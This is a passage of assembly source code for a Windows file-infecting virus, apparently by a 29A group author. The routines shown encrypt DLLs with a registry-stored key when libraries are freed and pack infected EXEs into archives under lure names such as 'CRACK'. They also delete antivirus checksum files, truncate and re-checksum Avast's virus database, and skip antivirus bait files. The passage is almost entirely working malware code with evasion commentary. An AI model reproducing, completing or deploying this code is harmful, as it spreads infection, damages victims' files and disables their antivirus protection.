		push	[ebp+__df_handle]	;truncate last 16 bytes
		call	[ebp+ddSetEndOfFile]

	__df_dealloc:
		mov	eax,[ebp+__df_memory]
		call	mdealloc
	__df_fClose:
		mov	ebx,[ebp+__df_handle]
		call	__MyCloseFile

	__df_finish:
		jmp	__ct_finish		;go back to thread

;ÄÄÄ´ function to get cryptography key ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function opens register to get SIMPLE key.
		;
		;Behaviour:
		;  * open register folder "\...\Cryptography\Prizzy/29A"
		;  * read SIMPLE key from "Kiss Of Death"
		;  * get CSP and import SIMPLE key by WinAPI functions
		;  * close register handle, return ImportedKey handle
		;
		;
		;  input:	none
		;  output:	EAX ... imported key (if error, EAX=0)
		;
		__clk_regHan	dd	00000000h	;register handle
		__clk_regFlag	dd	00000000h	;register flags
		__clk_memory	dd	00000000h	;key's memory place
		__clk_sim_len	dd	00000000h	;simple key length
		__clk_provider	dd	00000000h	;CSP provider
		__clk_hKey	dd	00000000h	;imported key
		;
crypt_loadKey:

		; don't call this function once again in actual time
		mov	dword ptr [ebp+crypto_thread],00000000h

		; get delta offset
		call	get_base_ebp

		; has key been loaded ?
		cmp	dword ptr [ebp+crypto_loadKey],00000000h
		jnz	__clk_finish

		xor	eax,eax
		mov	[ebp+__clk_hKey],eax

		; open register folder
		lea	eax,[ebp+__clk_regHan]
		mov	ecx,80000001h		;HKEY_CURRENT_USER
		lea	esi,[ebp+crypto_Register]
		call	__regOpen
		jc	__clk_finish

		; allocate memory for SIMPLE key
		mov	eax,00000100h
		call	malloc
		mov	[ebp+__clk_memory],eax

		; load "Kiss Of Death" item, it is SIMPLE key...
		lea	eax,[ebp+__clk_sim_len]
		mov	dword ptr [eax],00000100h
		push	eax			;address of data buffer size
		push	[ebp+__clk_memory]	;address of data buffer
		mov	eax,00000003h
		lea	ebx,[ebp+__clk_regFlag]
		mov	[ebx],eax
		push	ebx			;REG_BINARY flag
		push	00000000h		;reserved
		lea	eax,[ebp+crypto_RegFlag]
		push	eax			;name of value
		push	[ebp+__clk_regHan]
		call	[ebp+ddRegQueryValueExA]
		or	eax,eax
		jnz	__clk_close_key

		; get CPS provider handle
		push	00000000h		;Flags
		push	00000001h		;PROV_RSA_FULL
		push	00000000h		;provider name
		lea	eax,[ebp+crypto_KeyName]
		push	eax			;my special key
		lea	eax,[ebp+__clk_provider]
		push	eax			;CSP provider
		call	[ebp+ddCryptAcquireContextA]
		or	eax,eax 		;does key exist ?
		jz	__clk_close_key

		; import SIMPLE key
		lea	eax,[ebp+__clk_hKey]
		push	eax			;imported key
		push	00000000h		;flags
		push	00000000h
		push	[ebp+__clk_sim_len]	;length of SIMPLE key
		push	[ebp+__clk_memory]	;SIMPLE key
		push	[ebp+__clk_provider]
		call	[ebp+ddCryptImportKey]

	__clk_close_key:
		push	[ebp+__clk_regHan]
		call	[ebp+ddRegCloseKey]
	__clk_dealloc:
		mov	eax,[ebp+__clk_memory]
		call	mdealloc

		mov	[ebp+crypto_loadKey],'!A92'

	__clk_finish:
		mov	eax,[ebp+__clk_hKey]	;imported key (0=error)
		jmp	__ct_finish		;back to thread

;ÄÄÄ´ do NOT crypted DLL checking - name check and registry ÃÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function checks whether DLL come under to  the avoid
		;table. Heh, what does it mean ? Why some  DLLs can NOT be
		;crypted ? Well, I hook all file  operations from kernel32
		;memory when I'll be actived but till then system 'll open
		;some libraries like KERNEL32.DLL, USER32.DLL ... and then
		;it is my turn to hook, to check. This is that problem.
		;
		__cdc_regHandle dd	00000000h	;register handle
		__cdc_valuesLen dd	00000000h	;MaxValueLen
		__cdc_values	dd	00000000h	;number of values
		__cdc_buffSize	dd	00000000h	;buffer size
		__cdc_nRegistry dd	00000000h	;number of r. classes
		__cdc_memory	dd	00000000h	;namez
		;
		;  input:	EBX ... filename
		;
crypt_DLL_check:

		; save all registers
		pusha

		; check from our table
		lea	esi,[ebp+crypto_unFiles]
		call	validate_name		;is it do NOT crypt file ?
		jc	__cdc_failed

		mov	[ebp+__cdc_nRegistry], \
			(crypto_unReg_E - crypto_unReg) / 4 - 1

		; open registry key
	__cdc_next_class:
		lea	eax,[ebp+__cdc_regHandle]
		mov	ecx,80000002h		;HKEY_LOCAL_MACHINE
		mov	esi,[ebp+__cdc_nRegistry]
		mov	esi,dword ptr [ebp+crypto_unReg+esi*04h]
		add	esi,ebp
		call	__regOpen
		jc	__cdc_finish		;failed ?

		; read number of values
		xor	eax,eax
		push	eax eax 		;LWriteTime, SecDescriptor
		lea	edx,[ebp+__cdc_valuesLen]
		push	edx eax 		;MaxValueLen, MaxValueNameLen
		lea	edx,[ebp+__cdc_values]
		push	edx eax eax eax eax eax eax
		push	[ebp+__cdc_regHandle]
		call	[ebp+ddRegQueryInfoKeyA]
		or	eax,eax 		;failed ?
		jnz	__cdc_regClose

		; allocate memory
		mov	eax,[ebp+__cdc_values]
		imul	eax,[ebp+__cdc_valuesLen]
		mov	[ebp+__cdc_buffSize],eax
		inc	eax			;double zero char
		call	malloc
		mov	[ebp+__cdc_memory],eax

		; read all namez
		mov	esi,[ebp+__cdc_memory]	;pointer to store value name
	__cdc_repeat:
		mov	ecx,00000005h		;five layers
		dec	dword ptr [ebp+__cdc_values] ;next value index
	__cdc_once_again:
		lea	eax,[ebp+__cdc_valuesLen] ;length of value name
		push	eax			;buffer's size
		push	esi			;value name buffer
		push	00000000h		;type of value entry
		push	00000000h		;reserved
		call	$+9
		dd	?			;cbValueName
		push	00000000h		;value name
		push	[ebp+__cdc_values]	;index of value to retrieve
		push	[ebp+__cdc_regHandle]
		call	[ebp+ddRegEnumValueA]	;read index entry
		cmp	eax,000000EAh		;ERROR_MORE_DATA
		jnz	__cdc_check_next
		loop	__cdc_once_again	;try to read that once again
       __cdc_check_next:
		push	[ebp+__cdc_valuesLen]	;number of characters
		push	esi			;filename
		call	[ebp+ddCharUpperBuffA]	;convert to uppercase
		add	esi,[ebp+__cdc_valuesLen] ;next entry in memory buf
		cmp	dword ptr [ebp+__cdc_values],00000000h
		jnz	__cdc_repeat
		mov	byte ptr [esi],01h	;end char status
		mov	esi,[ebp+__cdc_memory]	;avoid table
		call	validate_name		;EBX is filled
		pushf				;ehm :)

		; close register class
		push	[ebp+__cdc_regHandle]
		call	[ebp+ddRegCloseKey]

		; deallocate memory
		mov	eax,[ebp+__cdc_memory]
		call	mdealloc

		; next register key
		popf				;ehm :)
		jc	__cdc_failed
		cmp	dword ptr [ebp+__cdc_nRegistry],00000000h
		jz	__cdc_finish
		dec	dword ptr [ebp+__cdc_nRegistry]
		jmp	__cdc_next_class

		; restore all registers
	__cdc_finish:
		test	al,0F9h 		;hidden STC instruction
	__cdc_failed equ $-1
		popa
		ret

		; close register class
	__cdc_regClose:
		push	[ebp+__cdc_regHandle]
		call	[ebp+ddRegCloseKey]
		jmp	__cdc_finish

;ÄÄÄ´ cryptography thread ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This is true Cryptography thread which can run some common
		;functions, because crypto functions allocated memory ain't
		;shared, so I must use this thread.
		;
		;  input:
		;    crypto_thread ... CT_LOADKEY     - crypt_loadKey func
		;		   ... CT_CRYPTFILE   - crypt_file function
		;		   ... CT_DECRYPTFILE - decrypt_file function
		;
		;  output:
		;    crypto_thread_err ... lastError flag
		;
crypt_thread:

		; save all registers & get delta offset
		pusha
		call	get_base_ebp

		; get thread action
		mov	eax,[ebp+crypto_thread]
		cmp	eax,CT_LOADKEY		;crypt_loadKey
		jz	crypt_loadKey
		cmp	eax,CT_CRYPTFILE	;crypt_file
		jz	crypt_file
		cmp	eax,CT_DECRYPTFILE	;decrypt_file
		jz	decrypt_file
		jmp	__ct_finish_all 	;bad input parameter

		; set (C)arry and EAX
	__ct_finish:
		mov	[ebp+crypto_thread_err],eax

		; restore all registers
	__ct_finish_all:
		push	2			;wait for a while
		call	[ebp+ddSleep]

		popa
		jmp	crypt_thread

;ÄÄÄ´ get FileName of library ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function is  called from "FreeLibrary" function. Be-
		;cause FL parameter is place in memory, I have to  get its
		;filename to crypt that.
		;
		;Behaviour:
		;  * get filename from handle (FreeLibrary parameter)
		;  * check DLL name (might I crypt u ?)
		;  * run FreeLibrary function (file was closed)
		;  * get process where I created "crypto thread"
		;  * crypt file (by thread: CT_CRYPTFILE flag)
		;  * go back (two ways: success OR failed)
		;
crypt_get_library:

		; save all registers
		pusha

		; get FileName of the module
		push	filename_size
		lea	eax,[ebp+filename]
		mov	[ebp+filename_ptr],eax
		push	eax			  ;input parameter for Free-
		push	dword ptr [esp+00000054h] ;Library function
		call	[ebp+ddGetModuleFileNameA]

		; check whether I can crypt that file
		mov	ebx,[ebp+filename_ptr]
		call	crypt_DLL_check

	__final_SoftICE_2:
		nop
		nop
;		 int	 4			 ;final SoftICE breakpoint

		jc	__cgl_finish

		; free library from memory
		popa				;ehm :)
		popf
		popa
		push	dword ptr [esp+00000008h]
		mov	eax,[esp+00000004h]
		call	[eax+1] 		;FreeLibrary function, huh?
		pusha

		; crypt that file
		call	get_base_ebp		;damn bug !
		cmp	[ebp+crypto_thread_err],'!A92'
		jz	__cgl_finish2		;other process ?
		mov	[ebp+crypto_thread],CT_CRYPTFILE
		mov	[ebp+crypto_thread_err],'!A92'
		push	[ebp+crypto_mainProcId] ;active process where I cre-
		push	00000000h		;ated my thread, I cannot
		push	00000001h		;active my thread from other
		call	[ebp+ddOpenProcess]	;process then where was cre-
		push	eax			;ated
	__cgl_cCryptFile:
		push	50			;active crypto thread
		push	dword ptr [esp+00000004h]
		call	[ebp+ddWaitForSingleObject]
		cmp	[ebp+crypto_thread_err],'!A92'
		jz	__cgl_cCryptFile	;crypto thread must crypt DLL
		call	[ebp+ddCloseHandle]

		; restore all registers
	__cgl_finish2:
		popa
		add	esp,00000004h
		ret	4			;go back, my lord !

	__cgl_finish:
		popa
		jmp	__hif_finish

;ÄÄÄ´ common register functions ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

__regOpen:		; open certain register class
			;   input:
			;     EAX ... address of register handle
			;     ECX ... reg (HKEY_CURRENT_USER, HKEY_*, ...)
			;     ESI ... register class
			;   output:
			;     (C)flags
			;     EAX ... is NOT modified
			;

		pusha				;save all registers
		push	eax			;address of register handle
		push	000F003Fh		;flag: KEY_ALL_ACCESS
		push	00000000h		;reserved
		push	esi			;register class
		push	ecx			;reg id
		call	[ebp+ddRegOpenKeyExA]
		or	eax,eax 		;fault ?
		popa				;restore registers
		jnz	__cReg_fault
		test	al,0F9h 		;hidden STC instruction
	__cReg_fault	equ $-1
		ret

;ÄÄÄ´ functions to calculate brute-CRC64 and CRC32 for APIs ÃÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function tries to calculate "brute-CRC64" value for
		;certain buffer when the first two valuez won't know. So,
		;I won't generate DWORD because this operation is very
		;difficult for CPU but instead this I'll encode two WORDs.
		;For DLL encrypting i use this method but for PPE-II I'll
		;generate DWORD.
		;
		;  input:    ESI ... source data
		;	     ECX ... defined data in buffer ESI
		;
		;  output:   EAX ... my low  "brute-CRC64" value
		;	     EDX ... my high "brute-CRC64" value
		;
__bruteCRC64:
		push	esi ecx
		add	esi,00000002h		;next WORD
		sub	ecx,00000002h
		call	__bCRC64_calculate
		pop	ecx esi
		push	eax			;save the 1st "CRC64" value
		call	__bCRC64_calculate
		pop	edx
		ret

	__bCRC64_calculate:
		xor	edx,edx 		;clear registers
		xor	ebx,ebx
		xor	eax,eax
	__bCRC64_next_byte:
		lodsb				;load next byte
		xor	dl,al
		xor	bh,dh
		sub	ebx,eax
		mov	al,8
	__bCRC64_next_bit:
		rcl	edx,1			;set (c)arry ?
		jc	__bCRC64_no_changes
		xor	edx,0C1A7F39Ah		;ahhh, special valuez
		xor	ebx,09C3B248Eh
		xor	ebx,edx
       __bCRC64_no_changes:
		dec	al			;next bit ?
		jnz	__bCRC64_next_bit
		dec	ecx
		jnz	__bCRC64_next_byte
		xchg	eax,ebx 		;low value to EAX
		ret

		;---------------------------------------------------------
		;This function wants to get right value which 's been lost
		;Thru "brute-attack" method.
		;
		;  input:    ESI ... input buffer
		;	     ECX ... number of bytes in buffer with l.value
		;	     EAX ... low  generated "brute-CRC64" value
		;	     EDX ... high generated "brute-CRC64" value
		;
		;  output:   EAX ... original value
		;
__get_bruteCRC64:

		xor	ebx,ebx
		mov	[esi],ebx		;clear original value to zero
		push	eax edx 		;save generated "brute-CRC64"
		push	esi ecx 		;save POS and COUNTER
		add	esi,00000002h		;the second value
		sub	ecx,00000002h
	__g_bCRC64_second_word:
		push	esi ecx 		;save POS and COUNTER
		call	__bCRC64_calculate	;check its "brute-CRC64"
		pop	ecx esi
		inc	word ptr [esi]		;increase original value
		cmp	[esp+00000008h],eax	;ahhh, what's now ?
		jnz	__g_bCRC64_second_word
		dec	word ptr [esi]		;decrease original value

		pop	ecx esi 		;start of the 1st value
	__g_bCRC64_first_value:
		push	esi ecx 		;save POS and COUNTER
		call	__bCRC64_calculate	;calculate its "brute-CRC64"
		pop	ecx esi
		inc	word ptr [esi]		;increase original value
		cmp	[esp+4],eax		;ahhh, what's now ?
		jnz	__g_bCRC64_first_value
		dec	word ptr [esi]		;decrease original value
		add	esp,00000008h		;take away CRC64
		ret

		;---------------------------------------------------------
		;This function calculates CRC32 for name of API functions.
		;The code has been stolen from LoRez source, hi mLapse :)
		;
		__mCRC32	equ	0C1A7F39Ah
		__mCRC32_init	equ	09C3B248Eh
		;
__macro_CRC32	macro	string
	    crcReg = __mCRC32_init
	    irpc    _x,<string>
		ctrlByte = '&_x&' xor (crcReg and 0FFh)
		crcReg = crcReg shr 8
		rept 8
		    ctrlByte = (ctrlByte shr 1) xor (__mCRC32 * (ctrlByte and 1))
		endm
		crcReg = crcReg xor ctrlByte
	    endm
	    dd	crcReg
endm

		;---------------------------------------------------------
		;I don't compare API stringz in kernel32 but CRC32.
		;
		;  input:    ESI ... string
		;  output:   EAX ... CRC32
		;
__get_CRC32:
		push	edx
		mov	edx,__mCRC32_init
	__gCRC32_next_byte:
		lodsb
		or	al,al			;end of name ?
		jz	__gCRC32_finish

		xor	dl,al
		mov	al,08h
	__gCRC32_next_bit:
		shr	edx,01h
		jnc	__gCRC32_no_change
		xor	edx,__mCRC32
	__gCRC32_no_change:
		dec	al
		jnz	__gCRC32_next_bit
		jmp	__gCRC32_next_byte
	__gCRC32_finish:
		xchg	eax,edx 		;CRC32 to EAX
		pop	edx
		ret

;ÄÄÄ´ function to add dropper to table ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function is main feature for inside-archive works.
		;
		;What we know:
		;  * this function is called from "infect_file"
		;  * it's certainly *.EXE file
		;  * its filesize is lesser then 30Kb
		;
		;Headlines:
		;  * get empty archive dropper (create ZIP/ARJ's dropper ?)
		;      * if CAB, no packing (stupid structure)
		;  * give me TEMP directory (e.g. \WINDOWS\TEMP)
		;  * create random TEMP file name (e.g. 29A + 0001.TMP, ...)
		;  * get random file name (e.g. SETUP, CRACK, GRATIS, ...)
		;  * copy infected file to TEMP directory under new name
		;  * create compress command
		;      (e.g. C:\ACE.EXE a -ep -m5 C;\TEMP\RUN.EXE C:\TEMP\29A0001.TMP)
		;  * create process and execute that command
		;  * check process' thread whether process has been finished
		;  * delete random file name
		;
		;
		;  input:      EAX ... filesize
		;
		__new_dName	dd	00000000h	;dropper's newName
		;
__add_dropper:

		; save registers
		pusha

		; some free archiver program ?
		mov	ecx,NewArchiveNum
	__ad_searching:
		mov	eax,ecx 		;convert <1..NewArchiveNum>
		dec	eax			;  t o	 <0..NewArchiveNum-1>
		lea	esi,[ebp+NewArchive]
		imul	eax,NewArchiveSize
		add	esi,eax
		push	ecx

		; test whether dropper has been created
		cmp	[esi.dropper],00000000h
		jnz	__ad_next

		; test whether CAB structure is empty
		cmp	ecx,NewArchiveNum
		jnz	__ad_next_archive

		mov	eax,filename_size	;allocate mem for CAB's name
		call	malloc
		mov	[esi.dropper],eax
		mov	edi,eax 		;copy archive name EXE to
		mov	esi,[ebp+filename_ptr]	;my new CAB file name buffer
		mov	ecx,filename_size
		rep	movsb
		jmp	__ad_next

		; test whether archiver program has been found
	__ad_next_archive:
		mov	ebx,esi
		cmp	[ebx.program],00000000h
		jz	__ad_next

		; time to prepare dropper - alloc mem, get temp filename
		mov	eax,filename_size
		call	malloc
		mov	[ebx.dropper],eax

		; get TEMP directory
		push	eax			;outta buffer
		push	filename_size
		call	[ebp+ddGetTempPathA]
		or	eax,eax 		;give me filepath length
		jz	__ad_dealloc

		; generate new filename for dropper
		mov	ecx,eax
		mov	eax,filename_size
		call	malloc
		mov	[ebp+__new_dName],eax

		push	eax
		mov	edi,eax 		;destination place
		mov	esi,[ebx.dropper]
		rep	movsb
		call	generate_name
		pop	edi

		; copy "filename_name" to "edi"
		push	00000000h		;rewrite its
		push	edi			;new filepath and filename
		push	[ebp+filename_ptr]	;actual filename
		call	[ebp+ddCopyFileA]
		or	eax,eax
		jz	__ad_dealloc_name

		; get TEMP file like destination archive name
		mov	edi,[ebx.dropper]	;destination place
		push	edi
		push	00000000h
		lea	eax,[ebp+__ad_TEMP_three_chars]
		push	eax			;the first three chars
		push	edi			;main TEMP directory
		call	[ebp+ddGetTempFileNameA]

		; delete TEMP file like archive name
		push	[ebx+dropper]
		call	[ebp+ddDeleteFileA]

		; get filname's last char from archiver
		mov	edi,[ebx.program]
		xor	al,al
		mov	ecx,-1
		repnz	scasb
		dec	edi

		; get archiver's input parameters
		pop	ecx
		push	ecx

		dec	ecx			;convert to <0..
		imul	ecx,ArchiverCommandRealSize
		lea	esi,[ebp+ArchiverCommand]
		add	esi,ecx
		mov	ecx,ArchiverCommandSize
		rep	movsb			;copy input parameters

		; generate compression method
		lodsb				;number of compression method
		movzx	eax,al
		call	ppe_get_rnd_range
		add	esi,eax
		lodsb				;get compression method char
		stosb				;copy it
		mov	al,20h			;space letter
		stosb

		mov	esi,[ebx.dropper]
		@copysz
		mov	byte ptr [edi-1],20h	;space letter

		mov	esi,[ebp+__new_dName]
		@copysz
		mov	byte ptr [edi-1],00h	;zero letter

		; get some startup information
		lea	eax,[ebp+StartupInfo]
		push	eax
		call	[ebp+ddGetStartupInfoA]

		mov	esi,[ebx.program]
		lea	eax,[ebp+ProcessInformation]
		push	eax
		lea	eax,[ebp+StartupInfo]
		push	eax

		; set window's info
		mov	word ptr [eax.dwFlags], 0001h ;STARTF_USESHOWINDOW
		mov	word ptr [eax.wShowWindow], 0000h ;SW_HIDE
		xor	eax,eax
		push	eax			;CurrentDirectory
		push	eax			;Environment
		push	04000000h or \		;CREATE_PROCESS_ERROR_MODE
			00000200h or \		;CREATE_NEW_PROCESS_GROUP
			00000080h		;HIGH_PRIORITY_CLASS
		push	eax			;InheritHandles: FALSE
		push	eax			;ThreadAttributes
		push	eax			;ProcessAttributes
		push	[ebx.program]		;Command
		push	eax			;Application Name
		call	[ebp+ddCreateProcessA]
		or	eax,eax 		;success ?
		jnz	__wait_to_comp

		; disable this achiver for future use
		mov	eax,[ebx.program]
		call	mdealloc
		mov	[ebx.program],00000000h
		jmp	__ad_dealloc		;dealloc droper as well

		; give time to compressing
	__wait_to_comp:
		push	1*4*1000		;4 seconds
		push	[ebp+ProcessInformation.hThread]
		call	[ebp+ddWaitForSingleObject]

		; shut down that process
		push	00000000h		;error-code
		push	[ebp+ProcessInformation.hProcess]
		call	[ebp+ddTerminateProcess]

		push	[ebp+__new_dName]	;delete copied file
		call	[ebp+ddDeleteFileA]

	__ad_dealloc_name:
		mov	eax,[ebp+__new_dName]	;dealloc dropper's new name
		call	mdealloc

	__ad_next:
		pop	ecx
		dec	ecx
		jnz	__ad_searching
		popa
		ret

	__ad_dealloc:
		mov	eax,[ebx.dropper]
		call	mdealloc
		mov	[ebx.dropper],00000000h
		jmp	__ad_next

	__ad_TEMP_three_chars:			;greeting to all from this
		db	'29A',0 		;excelent group (family)

;ÄÄÄ´ function to delete AV files ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function has been called from Hyper Infection - API.
		;So, If any AV checksum file has been found, I will delete
		;its.
		;
		;  input:    EDX ... file name
kill_av:

		push	edx
		call	[ebp+ddDeleteFileA]
		ret

;ÄÄÄ´ function to change AVAST's viruses database ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function modify/truncate AVAST's viruses database.
		;If you want to read tutorial about this method, download
		;it from my web: http://prizzy.cjb.net
		;
		;  input:    filename_ptr ... is filled
		;
		__ka_handle	dd	00000000h	;database's handle
		__ka_memory	dd	00000000h	;database's body
		__ka_new_size	dd	00000000h	;database's new size
		__ka_checksum	dw	0000h		;database's new chck
		;

kill_avast:

		; open AVAST's viruses database
		mov	edx,[ebp+filename_ptr]
		call	__MyOpenFile
		jc	__ka_finish
		mov	[ebp+__ka_handle],eax

		; generate new database's file size
		mov	eax,50000		;hmmm, + <0,50Kb)
		call	ppe_get_rnd_range
		add	eax,AVAST_memSize
		mov	[ebp+__ka_new_size],eax
		call	malloc
		mov	[ebp+__ka_memory],eax

		; read signature
		mov	edx,[ebp+__ka_memory]
		mov	ecx,00000004h		;four bytes, please
		xor	esi,esi
		mov	ebx,[ebp+__ka_handle]
		call	__MyReadFile
		jc	__ka_dealloc

		; check signature
		mov	eax,[ebp+__ka_memory]
		movzx	eax,word ptr [eax+00000002h]
		cmp	eax,000000F4h
		ja	__ka_dealloc

		; read new size
		mov	edx,[ebp+__ka_memory]
		mov	ecx,[ebp+__ka_new_size]
		mov	esi,00000002h
		mov	ebx,[ebp+__ka_handle]
		call	__MyReadFile
		jc	__ka_dealloc

		; calculate new checksum :)
		xor	di,di			;clear these regz
		xor	dx,dx
		xor	bx,bx
		xor	ax,ax

		mov	esi,[ebp+__ka_memory]	;place in memory
		mov	ecx,[ebp+__ka_new_size] ;really readed bytes
		sub	ecx,00000002h		;sub chacksum word

	__ka_decode_body:
		lodsb
		add	di,ax
		xor	dx,ax
		xor	bx,ax
		ror	bx,01h
		mov	ah,al
		loop	__ka_decode_body

		; and now, I must do the final test
		mov	ax,di
		xor	ax,dx
		xor	ax,bx			;AX=new checksum !!
		mov	[ebp+__ka_checksum],ax

		; write new checksum
		lea	edx,[ebp+__ka_checksum]
		mov	ecx,00000002h
		xor	esi,esi
		mov	ebx,[ebp+__ka_handle]
		call	__MyWriteFile
		jc	__ka_dealloc

		; truncate database :)
		push	00000000h
		push	00000000h
		push	[ebp+__ka_new_size]
		push	[ebp+__ka_handle]
		call	[ebp+ddSetFilePointer]

		push	[ebp+__ka_handle]
		call	[ebp+ddSetEndOfFile]

	__ka_dealloc:
		mov	eax,[ebp+__ka_memory]
		call	mdealloc
		mov	ebx,[ebp+__ka_handle]
		call	__MyCloseFile
	__ka_finish:
		ret

;ÄÄÄ´ may I infect that file ? ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function checks whether file is enabled to infect.
		;
		;  input:	EBX ... filename
		;		ESI ... pointer to an avoid table
		;
validate_name:

		; save all registers
		pusha
		lea	eax,[ebp+__va_check_file]
		push	eax
		mov	edi,ebx

		; get last '\' char
	__va_get_filename:
		push	edi
		call	[ebp+ddlstrlen]
		mov	ecx,eax
		add	edi,ecx
	__va_next_char:
		dec	edi
		cmp	byte ptr [edi],'\'
		jz	__va_found
		dec	ecx
		jnz	__va_next_char
		dec	edi
	__va_found:
		inc	edi
		sub	eax,ecx
		ret

	__va_check_file:
		push	esi
		call	[ebp+ddlstrlen]
		mov	ecx,eax
		push	esi edi
		rep	cmpsb
		pop	edi esi
		jz	__va_file_invalid
		add	esi, eax		;go to the next file
		inc	esi			; + zero char
		cmp	byte ptr [esi],01h	;end of table ?
		jnz	__va_check_file

		; restore all registers
		test	al,0F9h 		;hidden STC instruction
	__va_file_invalid	equ $-1
		popa
		ret

;ÄÄÄ´ anti-bait: do not infect AV files ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;Baits are do-nothing programs used by AVers to spread.
		;Familiarly AVers using these filenames:
		;     00000001.EXE, 00000002.EXE, 00000003.EXE etc.
		;or
		;     AAAAAAAA.EXE, AAAAAAAB.EXE, AAAAAAAC.EXE etc.
		;
		;This function checks if filename certains any triple chars
		;in sequence. It is typical anti-bait.
		;
		;  input:	filename_ptr	... is filled
		;
fuck_av_files:

		; save all registers
		pusha

		; get filename
		call	__va_get_filename	;EAX = filename length

		; check triple chars (= anti-bait)
		xor	eax,eax 		;AH=last char, AL=act. char
		xor	ebx,ebx 		;BL=how many chars
	__faf_repeat:
		mov	al,[edi]
		cmp	ah,al			;last char == actual char ?
		jz	__faf_same_char
		mov	ah,al
		xor	bl,bl
		jmp	__faf_next_char
	__faf_same_char:
		inc	bl
		cmp	bl,02h			;triple char ?
		jz	__faf_failed
	__faf_next_char:
		inc	edi
		cmp	byte ptr [edi],'.'
		jnz	__faf_repeat

		test	al,0F9h 		;hidden STC instruction
	__faf_failed	equ $-1
		popa
		ret

;ÄÄÄ´ function to check if file has been infected ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function check whether number in EAX is divided by
		;special number 117 which the autor has selected for this
		;virus. And 'cause every dividing is possible count through
		;natural logarithm, so I use this math method :).
		;
		;    in classic math:
		;	    " if ((EAX mod 117)==0) file_is_not_infected "
		;    in ln	math:
		;	    " if ((modf(exp(ln(EAX)-ln(117)),&integer)==0)
		;		  file_not_infected "
		;
		;Well, "a/b == e^(ln(a) - ln(b))"
		;      "a*b == e^(ln(a) + ln(b))" etc.
		;
		;      "exp(x) == 2^(x * log2ofE)" etc.
		;
		;Easy to understand :)
		;
__check_infected:

		push	ecx
		mov	dword ptr [ebp+source_value ],eax
		mov	dword ptr [ebp+divided_value],117

		fsave	[ebp+copro_nl_buffer]	;save all regz & flagz
		fninit				;inicialize co-processor
		fldln2				;give me "e^fldln2==2"
		fild	qword ptr [ebp+source_value] ;input number
		fyl2x				;calculate natural logarithm
		fldln2
		fild	qword ptr [ebp+divided_value]
		fyl2x				;calculate 2nd nat logarithm
		fsubp				;ln(EAX) - ln(117)

		fldl2e				;give me log2ofE == 2^
		fmulp
		fabs				;absolute number
		fld1
		fld

		fstcw	[ebp+exp_truncate]	;change rounding
		fstcw	[ebp+exp_default]
		fscale				;2^(trunc ST(1)) + ST(0)
		or	[ebp+exp_truncate],0Fh	;specify truncation mode
		fldcw	[ebp+exp_truncate]	;new mode
		frndint
		and	[ebp+exp_default+1],0f3h;default back to round-nearest
		fldcw	[ebp+exp_default]	;default mode

		fist	[ebp+exp_further]	;save calculing value
		fxch
		fchs				;negative
		fxch
		fscale
		fstp				;fscale did not adjust stack
		fsubp				;now is "0 <= st(0) < 0.5"

		f2xm1				;calculate 2^st(0)
		fld1
		faddp

		shr	word ptr [ebp+exp_further],0001h
		jnb	__no_sqrt2

		fld	tbyte ptr [ebp+sqrt2]	;use sqrt(2) to calculate
		fmulp				;the 2nd part

	__no_sqrt2:
		fild	word ptr [ebp+exp_further]
		fxch
		fscale				;fscale doesn't adjust stack
		fstp

		fldcw	[ebp+exp_truncate]	;set truncate mode
		fld	st(0)			;st(0)=st(1)
		frndint 			;truncate number
		fsubp				;give me only decimal places
		fild	qword ptr [ebp+rounded_value] ;rounding
		fmulp				;multiply by 10^x
		frndint
		fistp	dword ptr [ebp+decimal_places]
		fldcw	[ebp+exp_default]
		frstor	[ebp+copro_nl_buffer]	;restore all regz & flagz

		cmp	dword ptr [ebp+decimal_places],00000000h
		jnz	$+3
		test	al,0F9h 		;hidden STC instruction
		pop	ecx
		ret

sqrt2		dt	3FFFB504F333F9DE6485r	;copro sqrt(2) format
source_value	dq	0000000000h
divided_value	dq	0000000000h
rounded_value	dq	1000000000

;ÄÄÄ´ common file operations ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

__MyOpenFile:					;opens EDX file
		pusha				;save all registers
		xor	eax,eax
		push	eax
		push	FILE_ATTRIBUTE_NORMAL
		push	OPEN_EXISTING
		push	eax
		push	eax
		push	GENERIC_READ OR GENERIC_WRITE
		push	edx			;file name
		call	[ebp+ddCreateFileA]
		mov	[esp].access_eax,eax	;handle - take away
		popa
		cmp	eax,-1			;success ?
		jz	$+3			;jump if STC, if not CLC :)
		test	al,0F9h 		;hidden STC instruction
		ret

__MyReadFile:		; read some bytes (ECX) from certain filepos (ESI)
			; to buffer (EDX) by handle (EBX)
			;   input:
